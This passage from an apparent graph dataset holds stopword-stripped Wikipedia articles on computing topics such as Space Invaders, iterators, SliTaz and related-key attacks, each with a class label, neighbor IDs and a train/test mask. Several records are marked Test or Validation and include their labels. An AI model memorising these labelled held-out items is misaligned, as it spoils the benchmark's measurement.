60,000 machines united states within one year prices ranged 2000 3000 machine mid-1981 space invaders machines grossed four billion quarters 1 billion continued gross average 600 million year 1982 time grossed 2 billion quarters equivalent 2019 net profit 450 million equivalent 2019 made best-selling video game highest-grossing entertainment product time comparisons made highest-grossing film star wars grossed 486 million net profit 175 million space invaders earned taito profits 500 million 1980 atari 2600 version first official licensing arcade game consoles became first killer app video game consoles quadrupling system sales sold two million units first year sale home console game making first title sell million cartridges official ports released atari 8-bit computer line atari 5200 console taito later released nintendo famicom 1985 japan numerous unofficial clones made popular computer games super invader 1979 ti invaders 1981 latter top-selling game texas instruments ti-99/4a least 1982 adjusted inflation sales versions space invaders combined estimated exceeded 13 billion gross revenue making highest-grossing video game time urban legend states space invaders popularity led shortage 100-yen coins japan actuality 100-yen coin production lower 1978 1979 previous subsequent years additionally arcade operators would emptied machines taken money bank thus keeping coins circulation reports living japan time indicate nothing ordinary ... height space invaders invasion one earliest shooting games space invaders set precedents helped pave way future titles shooting genre space invaders popularized interactive style gameplay enemies responding player-controlled cannon movement first video game popularize concept achieving high score first save player score earlier shooting games allowed player shoot targets space invaders first targets could fire back player also first game players given multiple lives repel hordes enemies could take cover enemy fire use destructible barriers addition first game use continuous background soundtrack four simple diatonic descending bass notes repeating loop dynamic changed pace stages like heartbeat sound increases pace enemies approached game developers including shigeru miyamoto creator franchises donkey kong super mario legend zelda hideo kojima metal gear john romero john carmack doom cited space invaders introduction video games miyamoto considers space invaders game revolutionized video game industry deus ex creator warren spector said space invaders games like represent roots everything see today gaming represents birth new art form one literally changed world space invaders important historical artefact less silent films early twentieth century early printed books several publications ascribed expansion video game industry novelty global industry success game edge magazine attributed shift games bars amusement arcades mainstream locations restaurants department stores space invaders popularity first game arcade machine owner could make cost machine one month places within one week space invaders also moved gaming industry pong -inspired sports games grounded real-world situations towards fantastical action games space invaders helped action games become dominant genre arcades consoles guinness world records considered space invaders one successful arcade shooting games 2008 describing seminal arcade classic ign listed number eight classic shoot 'em space invaders set template shoot 'em genre worldwide success created demand wide variety science fiction games inspiring development arcade games atari asteroids williams electronics defender namco galaxian galaga modeled space invaders gameplay design influence could said extend shooting games released present day including first-person shooters fps wolfenstein doom halo call duty space invaders also influence early computer dungeon crawl games dungeons daggorath used similar heartbeat sounds indicate player health space invaders cabinets become collector items cocktail cabaret versions rarest technology journalist jason whittaker credited game ending video game crash 1977 caused pong clones flooding market beginning golden age video arcade games 1978–1980s according observer home console versions space invaders popular encouraged users learn program many became industry leaders 1up.com stated space invaders showed video games could compete major entertainment media time movies music television ign attributed launch arcade phenomenon north america part space invaders electronic games credited game success impetus behind video gaming becoming rapidly growing hobby single popular coin-operated attraction time game informer considered along pac-man one popular arcade games tapped popular culture generated excitement golden age arcades space invaders inducted world video game hall fame 2016 1996 next generation magazine put space invaders number 97 list top 100 games time saying provides elegance simplicity found later games like phoenix 1980 ign listed one top 10 influential games 2007 citing source inspiration video game designers impact shooting genre times ranked 1 list ten influential video games ever 2007 1up ranked 3 list 60 influential games time stating contrast earlier arcade games attempts simulate already-existing things space invaders first video game video game instead merely playable electronic representation something else 2008 guinness world records listed top-rated arcade game technical creative cultural impact entertainment weekly named space invaders one top ten games atari 2600 home console 2013 2018 ranked 87th video game canon statistical meta-analysis 48 top games lists published 1995 2017 space invaders remade numerous platforms spawned many sequels re-releases include ported updated versions original arcade game ported versions generally feature different graphics additional gameplay options—for example moving defense bunkers zigzag shots invisible aliens two-player cooperative gameplay ports earlier systems like atari home consoles featured simplified graphics later systems super nintendo entertainment system playstation featured updated graphics later titles include several modes gameplay integrate new elements original design example space invaders extreme released nintendo ds playstation portable integrated musical elements standard gameplay 2008 spin-off wiiware space invaders get even allows players control aliens instead laser cannon little bit role reversal 1980 bally-midway released pinball version game however elements original game included aliens instead resemble xenomorphs film alien bally-midway later sued game resemblance designs h. r. giger ports game met mixed receptions atari 2600 version successful nintendo entertainment system version poorly received taito released several arcade sequels first space invaders part ii 1979 featured color graphics attract mode new gameplay elements added intermission gameplay according killer list video games first video game include intermission game also allowed player top score sign name high score table version released united states deluxe space invaders also known space invaders deluxe featured different graphical color scheme lunar-city background another arcade sequel space invaders ii released exclusively united states cocktail-table format fast alien firing competitive two-player mode summer 1985 return invaders released updated color graphics complex movements attack patterns aliens subsequent arcade sequels included super space invaders '91 space invaders dx space invaders 95 game introduced minor gameplay additions original design like original game several arcade sequels become collector items though considered rarer 2002 taito released space raiders third-person shooter reminiscent space invaders game related games included video game compilation titles space invaders anniversary released 2003 playstation 2 included nine space invader variants similar title playstation portable space invaders pocket released 2005 space invaders space invaders part ii return invaders included taito legends compilation taito classic arcade games released 2005 playstation 2 xbox pc super space invaders '91 space invaders dx space invaders 95 included taito legends 2 sequel compilation released 2006 april 2017 redemption game raw thrills space invaders frenzy released stand-alone version released super impulse part tiny arcade series along namco games pac-man ms. pac-man galaxian space invaders title atari jaguar worked virtuality entertainment would featured support unreleased jaguar vr peripheral however project never entered full development beyond reaching pre-production stages remaining proof existence game design document many publications websites use pixelated alien graphic icon video games general including video game magazine electronic gaming monthly technology website ars technica concert event video games live also space invaders- themed merchandising including necklaces puzzles trend continues day handmade sites like etsy pinterest showcasing thousands handmade items featuring space invaders characters game—and references it—has appeared numerous facets popular culture soon game release hundreds favorable articles stories emerging video game medium popularized space invaders aired television printed newspapers magazines space invaders tournament held atari 1980 rebecca heineman first electronic sports esports event attracted 10,000 participants establishing video gaming mainstream hobby arcade awards ceremony created year honor best video games space invaders winning first game year goty award impact space invaders video game industry compared beatles pop music industry considered first 'blockbuster video game space invaders became synonymous video games worldwide time within year game release japanese pta unsuccessfully attempted ban game allegedly inspiring truancy north america doctors identified condition called space invaders elbow complaint physician new england journal medicine named similar ailment space invaders wrist space invaders also first game attract political controversy 1981 private member bill known control space invaders electronic games bill drafted british labour mp george foulkes attempted allow local councils restrict game like licensing addictive properties causing deviancy conservative mp michael brown defended game innocent harmless pleasure enjoyed day criticized bill example socialist beliefs restriction control motion bring bill parliament defeated 114 votes 94 votes bill never considered parliament musicians drawn inspiration music space invaders pioneering japanese synthpop group yellow magic orchestra reproduced space invaders sounds 1978 self-titled album hit single computer game latter selling 400,000 copies united states pop songs based space invaders soon followed including disco records disco space invaders 1979 funny stuff hit songs space invader 1980 pretenders space invaders 1980 uncle vic australian hit space invaders 1979 player one known us 'playback turn provided bassline jesse saunders 1984 first chicago house music track clash sampled sound effects game song ivan meets g.i joe 4th studio album sandinista video games live performed audio game part special retro classic arcade medley 2007 honor game 30th anniversary taito produced album titled space invaders 2008 album published avex trax features music inspired game taito store taito station also unveiled space invaders themed music video 1982 original pilot series powers matthew star david star uses powers cheat game game shown colored backdrop moon multiple television series aired episodes either reference parody game elements example danger mouse '70s show scrubs chuck robot chicken amazing world gumball elements prominently featured raiders lost arcade segment anthology interest ii episode animated comedy show futurama space invaders also appears films cherry 2000 1987 1991 pixels 2015 deluxe game made appearance fast times ridgemont high 1982 film version game works warner bros akiva goldsman producing february 13 2015 daniel kunka set write script film july 12 2019 greg russo set write script film goldsman still producing alongside safehouse pictures partners joby harold tory tunnell various books published space invaders including 1982 martin amis 2006 geof king tanya krzywinska space invaders 1980 mark roeder julian wolanski mid-'90s athletics company puma released t-shirt stamp references space invaders i.e spaceship aiming company logo see picture right 2006 game one several video game-related media selected represent japan part project compiled japan agency cultural affairs year space invaders included london science museum game exhibition meant showcase various aspects video game history development culture game part barbican centre traveling game exhibition belluard bollwerk international 2006 festival fribourg switzerland guillaume reymond created three-minute video recreation game space invaders part gameover project using humans pixels gh art exhibit 2008 games convention leipzig germany included art game invaders based space invaders gameplay creator later asked game removed exhibit following criticism elements based september 11 attacks united states bridge cáceres spain projected engineers pedro plasencia hadrián arias whose pavement design based game laser cannon shots several figures seen deck french street artist invader made name creating mosaic artwork space invader aliens around world 2014 two brazilian zoologists described new species arachnid taito spaceinvaders kury barros 2014 inspired game resemblance fleck dorsal scutum animal typical alien game 2018 highways england launched campaign titled “ ’ space invader stay safe stay back ” raise awareness dangers tailgating people also able order free car bumper stickers raise awareness campaign",
    "neighbors": [
      11522,
      3075,
      4361,
      7051,
      9998,
      921,
      10658,
      2861,
      9006,
      10287,
      11311,
      4409,
      4540,
      9917,
      10316,
      4690,
      3039,
      10093,
      1776
    ],
    "mask": "None"
  },
  {
    "node_id": 3076,
    "label": 9,
    "text": "Iterator:iterator computer programming iterator object enables programmer traverse container particularly lists various types iterators often provided via container interface though interface semantics given iterator fixed iterators often implemented terms structures underlying container implementation often tightly coupled container enable operational semantics iterator iterator performs traversal also gives access data elements container perform iteration i.e. without significant liberty taken concept trivial use terminology iterator behaviorally similar database cursor iterators date clu programming language 1974 internal iterators higher order functions often taking anonymous functions map reduce etc. implementing traversal across container applying given function every element turn external iterator may thought type pointer two primary operations referencing one particular element object collection called element access modifying points next element called element traversal must also way create iterator points first element well way determine iterator exhausted elements container depending language intended use iterators may also provide additional operations exhibit different behaviors primary purpose iterator allow user process every element container isolating user internal structure container allows container store elements manner wishes allowing user treat simple sequence list iterator class usually designed tight coordination corresponding container class usually container provides methods creating iterators loop counter sometimes also referred loop iterator loop counter however provides traversal functionality element access functionality one way implementing iterators use restricted form coroutine known generator contrast subroutine generator coroutine yield values caller multiple times instead returning iterators naturally expressible generators generators preserve local state invocations 're particularly well-suited complicated stateful iterators tree traversers subtle differences distinctions use terms generator iterator vary authors languages python generator iterator constructor function returns iterator example python generator returning iterator fibonacci numbers using python codice_1 statement follows object-oriented languages c c++ later versions delphi later versions go java later versions lua perl python ruby provide intrinsic way iterating elements container object without introduction explicit iterator object actual iterator object may exist reality exposed within source code language implicit iterators often manifested foreach statement equivalent following python example python iterable object converted iterator iterated loop done implicitly times may created collection object ruby example iteration style sometimes called internal iteration code fully executes within context iterable object controls aspects iteration programmer provides operation execute step using anonymous function languages support list comprehensions similar constructs may also make use implicit iterators construction result list python sometimes implicit hidden nature partial c++ language function templates implicit iteration codice_2 functions still require explicit iterator objects initial input subsequent iteration expose iterator object user iterators useful abstraction input streams – provide potentially infinite iterable necessarily indexable object several languages perl python implement streams iterators alternative implementations stream include data-driven languages awk sed procedural languages common use subscript operator loop counter loop elements sequence array although indexing may also used object-oriented containers use iterators may advantages ability container modified iterating elements become necessary modern object-oriented programming interrelationships objects effects operations may obvious using iterator one isolated sorts consequences assertion must however taken grain salt often efficiency reasons iterator implementation tightly bound container preclude modification underlying container without invalidating containers may move around data memory way invalidate iterator container somehow keep track currently alive iterators update fly since number iterators given time may arbitrarily large comparison size tied container updating drastically impair complexity guarantee container operations alternative way keep number updates bound relatively container size would use kind handle mechanism collection indirect pointers container elements must updated container let iterators point handles instead directly data elements approach negatively impact iterator performance since must effectuate double pointer following access actual data element usually desirable many algorithms using iterators invoke iterators data access operation often advance method therefore especially important iterators efficient data access always trade-off security iterators remain always valid efficiency time added security worth efficiency price pay using alternative container example singly linked list instead vector would better choice globally efficient stability iterators needed iterators categorised according functionality non-exhaustive list iterator categories different languages libraries used languages define iterator types iterators .net framework called enumerators represented codice_3 interface codice_3 provides codice_5 method advances next element indicates whether end collection reached codice_6 property obtain value element currently pointed optional codice_7 method rewind enumerator back initial position enumerator initially points special value first element call codice_5 required begin iterating enumerators typically obtained calling codice_9 method object implementing codice_10 interface container classes typically implement interface however foreach statement c operate object providing method even n't implement codice_10 duck typing interfaces expanded generic versions .net 2.0 following shows simple use iterators c 2.0 c 2.0 also supports generators method declared returning codice_3 codice_10 uses codice_14 statement produce sequence elements instead returning object instance transformed compiler new class implementing appropriate interface c++ language makes wide use iterators standard library describes several categories iterators differing repertoire operations allow include forward iterators bidirectional iterators random access iterators order increasing possibilities standard container template types provide iterators one categories iterators generalize pointers elements array indeed used iterators syntax designed resemble c pointer arithmetic codice_15 codice_16 operators used reference element iterator points pointer arithmetic operators like codice_17 used modify iterators traversal container traversal using iterators usually involves single varying iterator two fixed iterators serve delimit range traversed distance limiting iterators terms number applications operator codice_17 needed transform lower limit upper one equals number items designated range number distinct iterator values involved one convention lower limiting iterator points first element range upper limiting iterator point element range rather beyond end range traversal entire container codice_19 method provides lower limit codice_20 upper limit latter reference element container valid iterator value compared following example shows typical use iterator iterator types separate container types used though two often used concert category iterator thus operations defined usually depends type container instance arrays vectors providing random access iterators sets use linked structure implementation providing bidirectional iterators container type one associated iterator type instance codice_21 container type allows traversal either using raw pointers elements type codice_22 values special type codice_23 yet another type provided reverse iterators whose operations defined way algorithm performing usual forward traversal actually traversal reverse order called reverse iterators containers also provide separate codice_24 type operations would allow changing values pointed intentionally defined simple traversal container object range elements including modification elements unless codice_24 used done using iterators alone container types may also provide methods like codice_26 codice_27 modify structure container methods container class addition require one iterator values specify desired operation possible multiple iterators pointing container simultaneously structure-modifying operations may invalidate certain iterator values standard specifies case whether may using invalidated iterator error lead undefined behvior errors need signalled run time system implicit iteration also partially supported c++ use standard function templates codice_28 codice_29 codice_30 used must initialized existing iterators usually codice_31 codice_32 define range iteration occurs explicit iterator object subsequently exposed iteration proceeds example shows use codice_33 achieved using codice_34 passing codice_35 value third iterator since c++11 lambda function syntax used specify operation iterated inline avoiding need define named function example for-each iteration using lambda function introduced java jdk 1.2 release interface allows iteration container classes codice_36 provides method may optionally support method iterators created corresponding container class typically method named codice_37 codice_38 method advances iterator returns value pointed iterator first element obtained upon first call codice_38 determine elements container visited codice_40 test method used following example shows simple use iterators show codice_40 called repeatedly use insert commas elements last element approach properly separate advance operation actual data access data element must used advance needs stored temporary variable advance needed without data access i.e skip given data element access nonetheless performed though returned value ignored case collection types support codice_42 method iterator removes recently visited element container keeping iterator usable adding removing elements calling methods container also thread makes iterator unusable attempt get next element throws exception exception also thrown elements remaining codice_40 previously returned false additionally similar api allows forward backward iteration provides current index list allows setting list element position j2se 5.0 release java introduced interface support enhanced codice_44 foreach loop iterating collections arrays codice_45 defines method returns codice_36 using enhanced codice_44 loop preceding example rewritten containers also use older since 1.0 codice_48 class provides codice_49 codice_50 methods methods modify container scala iterators rich set methods similar collections used directly loops indeed iterators collections inherit common base trait scala.collection.traversableonce however rich set methods available scala collections library map collect filter etc. often necessary deal iterators directly programming scala java iterators collections automatically converted scala iterators collections respectively simply adding single line import scala.collection.javaconversions._ file javaconversions object provides implicit conversions implicit conversions feature scala methods visible current scope automatically insert calls relevant expressions appropriate place make typecheck otherwise would n't matlab supports external internal implicit iteration using either native arrays codice_51 arrays case external iteration onus user advance traversal request next elements one define set elements within array storage structure traverse elements using codice_44-loop construct example traverses array integers using codice_44 keyword case internal iteration user supply operation iterator perform every element collection many built-in operators matlab functions overloaded execute every element array return corresponding output array implicitly furthermore codice_54 codice_55 functions leveraged performing custom user defined operations native arrays codice_51 arrays respectively example defines primary function codice_57 implicitly applies custom subfunction codice_58 element array using built-in function codice_54 alternatively may desirable abstract mechanisms array storage container user defining custom object-oriented matlab implementation iterator pattern implementation supporting external iteration demonstrated matlab central file exchange item design pattern iterator behavioral written new class-definition syntax introduced matlab software version 7.6 r2008a features one-dimensional codice_51 array realization list abstract data type adt mechanism storing heterogeneous data type set elements provides functionality explicit forward list traversal codice_40 codice_38 codice_63 methods use codice_64-loop php ’ foreach loop introduced version 4.0 made compatible objects values 4.0 beta 4 however support iterators added php 5 introduction internal traversable interface two main interfaces implementation php scripts enable objects iterated via foreach loop iterator iteratoraggregate latter require implementing class declare required methods instead implements accessor method codice_65 returns instance traversable standard php library provides several classes work special iterators php also supports generators since 5.5 simplest implementation wrapping array useful type hinting information hiding methods example class used execution complete foreach loop codice_66 iterator ’ methods executed following order next example illustrates php class implements traversable interface could wrapped iteratoriterator class act upon data returned foreach loop usage together codice_75 constant allows php scripts iterate result sets billions rows little memory usage features exclusive php mysql class implementations e.g pdostatement class implement traversable interface well iterators python fundamental part language many cases go unseen implicitly used codice_44 foreach statement list comprehensions generator expressions python standard built-in collection types support iteration well many classes part standard library following example shows typical implicit iteration sequence python dictionaries form associative array also directly iterated dictionary keys returned items method dictionary iterated yields corresponding key value pairs tuple iterators however used defined explicitly iterable sequence type class built-in function codice_77 used create iterator object iterator object iterated codice_38 function uses codice_79 method internally returns next element container previous statement applies python 3.x python 2.x codice_38 method equivalent codice_81 exception raised elements left following example shows equivalent iteration sequence using explicit iterators user-defined class support standard iteration either implicit explicit defining codice_82 method returns iterator object iterator object needs define codice_79 method returns next element python generators implement iteration protocol ruby implements iterators quite differently iterations done means passing callback closures container methods way ruby implements basic iteration also several patterns iteration like function mapping filters reducing ruby also supports alternative syntax basic iterating method codice_84 following three examples equivalent …and… even shorter ruby also iterate fixed lists using enumerators either calling next method rust implements iterators language iterate element vectors create iterators iterator iterator adapters map filter skip take ... fibonacci custom iterator",
    "neighbors": [
      10624,
      515,
      3076,
      8582,
      9735,
      5521,
      9490,
      8854,
      1435,
      155,
      5917,
      7326,
      9245,
      4777,
      5677,
      2617,
      8644,
      11589,
      3577,
      337,
      3705,
      7894,
      2011,
      10083,
      8680,
      11497,
      3562,
      8554,
      2669,
      3573,
      3321,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3077,
    "label": 3,
    "text": "Namco_System_246:namco system 246 namco system 246 development sony playstation 2 technology basis arcade system board released december 2000 first game bloody roar 3 like sega naomi widely licensed use manufacturers games battle gear 3 capcom fighting evolution examples system 246-based arcade games namco products namco system 256 upgraded version system 246 upgrades unknown vram faster cpu speeds likely namco super system 256 regular namco system 256 gun board integrated though variant used time crisis 4 namco system 147 similar 246 use dvd-rom drive instead rom chips system board",
    "neighbors": [
      4098,
      643,
      9091,
      11398,
      10761,
      6799,
      9508,
      6311,
      9512,
      684,
      306,
      1587,
      7234,
      1091,
      9543,
      10056,
      6732,
      10316,
      7801,
      6738,
      6873,
      859,
      4060,
      607,
      359,
      8937,
      4334,
      3824,
      5746,
      7028,
      5753,
      8316,
      6781
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3078,
    "label": 0,
    "text": "Analogical_modeling:analogical modeling analogical modeling formal theory exemplar based analogical reasoning proposed royal skousen professor linguistics english language brigham young university provo utah applicable language modeling categorization tasks analogical modeling related connectionism nearest neighbor approaches data-based rather abstraction-based distinguished ability cope imperfect datasets caused simulated short term memory limits base predictions relevant segments dataset whether near far language modeling successfully predicted empirically valid forms theoretical explanation known see discussion finnish morphology skousen et al 2002 exemplar-based model consists general-purpose modeling engine problem-specific dataset within dataset exemplar case reasoned informative past experience appears feature vector row values set parameters define problem example spelling-to-sound task feature vector might consist letters word exemplar dataset stored outcome phoneme phone generated model presented novel situation form outcome-less feature vector engine algorithmically sorts dataset find exemplars helpfully resemble selects one whose outcome model prediction particulars algorithm distinguish one exemplar-based modeling system another think feature values characterizing context outcome behavior occurs within context accordingly novel situation known given context given known features context engine systematically generates contexts include supracontexts extracts dataset exemplars belong engine discards supracontexts whose outcomes inconsistent measure consistency discussed leaving analogical set supracontexts probabilistically selects exemplar analogical set bias toward large supracontexts multilevel search exponentially magnifies likelihood behavior predicted occurs reliably settings specifically resemble given context performs process case asked evaluate given context consisting n variables used template generate formula_1 supracontexts supracontext set exemplars one variables values given context variables ignored effect view data created filtering criteria similarity given context total set supracontexts exhausts views alternatively supracontext theory task proposed rule whose predictive power needs evaluated important note supracontexts equal peers one another arranged distance given context forming hierarchy supracontext specifies variables another one subcontext one lies closer given context hierarchy strictly branching supracontext subcontext several others several subcontexts hierarchy becomes significant next step algorithm engine chooses analogical set among supracontexts supracontext may contain exemplars exhibit one behavior deterministically homogeneous included view data displays regularity relevant theory never yet disproven supracontext may exhibit several behaviors contain exemplars occur specific supracontext subcontexts case non-deterministically homogeneous included great evidence systematic behavior occurs also counterargument finally supracontext may heterogeneous meaning exhibits behaviors found subcontext closer given context also behaviors ambiguous behavior nondeterministically homogeneous supracontext accepted rejected intervening subcontext demonstrates better theory found heterogeneous supracontext therefore excluded guarantees see increase meaningfully consistent behavior analogical set approach given context analogical set chosen appearance exemplar given exemplar may appear several analogical supracontexts given pointer every appearance exemplar within supracontexts one pointers selected random followed exemplar points provides outcome gives supracontext importance proportional square size makes exemplar likely selected direct proportion sum sizes analogically consistent supracontexts appears course probability predicting particular outcome proportional summed probabilities exemplars support given context formula_2 elements terminology best understood example example used second chapter skousen 1989 context consists three variables potential values 0-3 two outcomes dataset e r exemplars define network pointers like solid lines represent pointers exemplars matching outcomes dotted lines represent pointers exemplars non-matching outcomes statistics example follows behavior predicted given context example let us predict outcome context 3 1 2 first find contexts containing given context contexts called supracontexts find supracontexts systematically eliminating variables given context variables generally formula_19 supracontexts following table lists sub- supracontexts means x means anything contexts shown venn diagram next step determine exemplars belong contexts order determine contexts homogeneous table shows subcontexts behavior terms given exemplars number disagreements within behavior analyzing subcontexts table see 1 subcontext disagreements 3 1 dataset consists 3 1 0 e 3 1 1 r 2 disagreements subcontext 1 pointing exemplars see pointer network pictured therefore supracontexts containing subcontext contain disagreements use simple rule identify homogeneous supracontexts number disagreements supracontext greater number disagreements contained subcontext say heterogeneous otherwise homogeneous 3 situations produce homogeneous supracontext two heterogeneous supracontexts 1 combination non-deterministic 3 1 subcontexts containing r outcome causes heterogeneity actually 4th type homogeneous supracontext contains one non-empty subcontext non-deterministic frequency outcomes sub-context exactly analogical modeling consider situation however 2 reasons next construct analogical set consists pointers outcomes homogeneous supracontexts figure shows pointer network homogeneous contexts highlighted pointers summarized following table 4 pointers analogical set associated outcome e 9 associated r pointer randomly selected outcome points predicted total 13 pointers probability outcome e predicted 4/13 30.8 outcome r 9/13 69.2 create detailed account listing pointers occurrences homogeneous supracontexts see analogical effect instances data set analogy considered useful describing language least since time saussure noam chomsky others recently criticized analogy vague really useful bańko 1991 appeal deus ex machina skousen proposal appears address criticism proposing explicit mechanism analogy tested psychological validity analogical modeling employed experiments ranging phonology morphology linguistics orthography syntax though analogical modeling aims create model free rules seen contrived linguists current form still requires researchers select variables take consideration necessary so-called exponential explosion processing power requirements computer software used implement analogical modeling recent research suggests quantum computing could provide solution performance bottlenecks skousen et al 2002 see pp 45–47",
    "neighbors": [
      1890,
      4070
    ],
    "mask": "Test"
  },
  {
    "node_id": 3079,
    "label": 2,
    "text": "SliTaz:slitaz slitaz gnu/linux lightweight gnu/linux distribution community-based suitable use older hardware live cd live usb slitaz stands simple light incredible temporary autonomous zone according boot screen slitaz uses openbox window manager additional packages added using program called tazpanel due specific package format slitaz uses tazpkg still use packages popular distribution though debian means first carrying conversion different packages default slitaz offers persistence however still added user wish choice filesystem/bootloader used slitaz importance however persistence available ext2 ext3 filesystems syslinux extlinux boot loader another useful tool tazlito users create livecd based selected packages even based upon current system state slitaz gnu/linux supported machines based i486 x86 intel compatible processors live cd four variants slitaz requiring 192 mb ram core system 48 mb text mode x window system slitaz even run 16 mb ram little swap memory slitaz booted live cd live usb floppy disk local area network pxe installed requiring approximately 80 mb hard disk space tazlito livecd creation utility slitaz gnu/linux check ensure uid zero i.e. tazlito run root root sudoer looks existence etc directory root file system directory n.b. checking ensure anything actually directory however tazlito used livecd creation operations one create/modify directories used tazlito directories existence implies populated properly looks existence boot directory root cd directory n.b. checking ensure anything actually directory however tazlito used livecd creation operations one create/modify directories used tazlito directories existence implies populated properly linux distribution route development slitaz mainly determined coders slitaz 5 major changes seem swapping systemd busybox init udev hence avoiding safety risks implementation qt implementation x64 arm architectures currently development dedoimedo reviewed slitaz gnu/linux 1.0 wrote dedoimedo also reviewed version 2.0 distrowatch wrote distrowatch weekly review slitaz gnu/linux 1.0",
    "neighbors": [
      516,
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      4637,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      8513,
      10817,
      2375,
      4039,
      5067,
      8907,
      11388,
      1110,
      9693,
      2914,
      6371,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      499,
      5363,
      9461,
      6393,
      6012,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 3080,
    "label": 1,
    "text": "List_of_object-relational_mapping_software:list object-relational mapping software list well-known object-relational mapping software up-to-date all-inclusive athena framework open source flex orm native support multitenancy",
    "neighbors": [
      3712,
      9729,
      2819,
      1034,
      10250,
      3853,
      9614,
      2063,
      3087,
      11030,
      2845,
      7074,
      5669,
      5546,
      2348,
      3763,
      7475,
      3517,
      7485,
      7742,
      2631,
      11338,
      6860,
      10573,
      4944,
      8539,
      1884,
      7518,
      5987,
      3821,
      7022,
      9589,
      8825,
      9467,
      3710
    ],
    "mask": "Test"
  },
  {
    "node_id": 3081,
    "label": 2,
    "text": "Resource_allocation_(computer):resource allocation computer computing resource allocation necessary application run system user opens program counted process therefore requires computer allocate certain resources able run resources could access section computer memory data device interface buffer one files required amount processing power computer single processor perform one process time regardless amount programs loaded user initiated start-up computers using single processors appear running multiple programs processor quickly alternates programs processing needed small amounts time process known multitasking time slicing time allocation automatic however higher lower priority may given certain processes essentially giving high priority programs more/bigger slices processor time computer multiple processors different processes allocated different processors computer truly multitask programs adobe photoshop yafray require intense processing power coded able run one processor thus running quickly efficiently method generally suitable multiprogramming environments actually helpful",
    "neighbors": [
      2432,
      4423,
      2345,
      1776,
      5972
    ],
    "mask": "Test"
  },
  {
    "node_id": 3082,
    "label": 3,
    "text": "L4Linux:l4linux llinux variant linux kernel altered extent run virtualized l4 l4 microkernel l4linux kernel runs service l4linux fork variant binary compatible linux/x86 kernel thus replace linux kernel linux distribution llinux developed dresden real-time operating system project drops allow real-time time-sharing-programs run computer parallel time llinux also allows setting virtualized environment vaguely similar xen kvm couple significant differences intention xen llinux l4android fork llinux encompasses modifications main-line linux kernel android joint project operating systems group dresden university technology chair security telecommunications berlin institute technology",
    "neighbors": [
      6150,
      4616,
      2058,
      5139,
      7187,
      10780,
      10785,
      6180,
      8242,
      9266,
      7733,
      10813,
      4161,
      5697,
      8772,
      6213,
      5702,
      8262,
      8268,
      589,
      7248,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      2212,
      8364,
      7349,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      8466,
      792,
      10016,
      6438,
      295,
      10537,
      9525,
      823,
      6968,
      7992,
      318,
      11075,
      3911,
      6988,
      10063,
      1362,
      7507,
      5975,
      11095,
      2910,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      7561,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9655,
      5049,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 3083,
    "label": 7,
    "text": "IncrediBuild:incredibuild incredibuild suite grid computing software developed incredibuild ltd. incredibuild designed help accelerate computationally-intensive tasks distributing network notable applications including compiling source code building software generally software development-related tasks jobs distributed several computers network giving possibility accelerating work using resources available initiating computer alone potentially freeing local resources tasks incredibuild tools available microsoft windows linux out-of-the-box support accelerating builds targeting platforms well android nintendo switch playstation 4 xbox one platforms originally sold specifically tool accelerate compiling incredibuild used development processes well general high performance computing incredibuild software suite broken several separately-licensable tools incredibuild visual studio c/c++ provides visual studio integration accelerate builds c c++ projects incredibuild make build tools provides integration several standard build tools including make cmake msbuild incredibuild dev tools provides additional interfaces distributing jobs need necessarily building compiling-related incredibuild several software development companies customers including number video game developers turn 10 studios instance used incredibuild accelerate builds rendering 3ds max code analysis tasks development forza 5 incredibuild also claims epic games electronic arts id software bohemia interactive scaleform corporation fromsoftware bugbear entertainment clients cryengine unreal engine include built-in support build acceleration via incredibuild incredibuild ltd. israeli company based tel aviv incredibuild selling product 2002 introduced incredibuild v1.0 offering solution acceleration microsoft visual studio 6.0 c/c++ code builds incredibuild 1.3 awarded game developer magazine annual front line award category programming year 2003 adding support visual studio .net visual studio 2005 incredibuild later expanded incredibuild time called xge interfaces package allowed customers implement custom acceleration jobs necessarily compilation-related exposing set interfaces incredibuild core grid engine technology 2008 incredibuild productivity award change configuration management category 18th annual jolt awards",
    "neighbors": [
      1952,
      5956,
      1480,
      5612,
      6797,
      4398,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 3084,
    "label": 4,
    "text": "Related-key_attack:related-key attack cryptography related-key attack form cryptanalysis attacker observe operation cipher several different keys whose values initially unknown mathematical relationship connecting keys known attacker example attacker might know last 80 bits keys always even though n't know first bits appears first glance unrealistic model would certainly unlikely attacker could persuade human cryptographer encrypt plaintexts numerous secret keys related way kasumi eight round 64-bit block cipher 128-bit key based upon misty1 designed form basis 3g confidentiality integrity algorithms mark blunden adrian escott described differential related key attacks five six rounds kasumi differential attacks introduced biham shamir related key attacks first introduced biham differential related key attacks discussed kelsey et al important example cryptographic protocol failed related-key attack wired equivalent privacy wep used wi-fi wireless networks client wi-fi network adapter wireless access point wep-protected network shares wep key encryption uses rc4 algorithm stream cipher essential key never used twice stream cipher prevent happening wep includes 24-bit initialization vector iv message packet rc4 key packet iv concatenated wep key wep keys changed manually typically happens infrequently attacker therefore assume keys used encrypt packets share single wep key fact opened wep series attacks proved devastating simplest understand uses fact 24-bit iv allows little 17 million possibilities birthday paradox likely every 4096 packets two share iv hence rc4 key allowing packets attacked devastating attacks take advantage certain weak keys rc4 eventually allow wep key recovered 2005 agents u.s. federal bureau investigation publicly demonstrated ability widely available software tools three minutes one approach preventing related-key attacks design protocols applications encryption keys never simple 